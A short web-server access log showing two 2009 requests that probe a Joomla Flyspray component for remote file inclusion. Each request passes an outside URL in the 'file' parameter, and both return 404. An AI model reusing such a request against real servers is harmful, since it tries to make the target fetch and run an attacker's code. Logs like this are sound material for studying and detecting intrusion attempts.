62.149.163.198 - - [17/Jul/2009:01:27:01 -0400] "GET /logs/access_log.Q109070300//components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 263 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
62.149.163.198 - - [17/Jul/2009:01:27:01 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 241 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
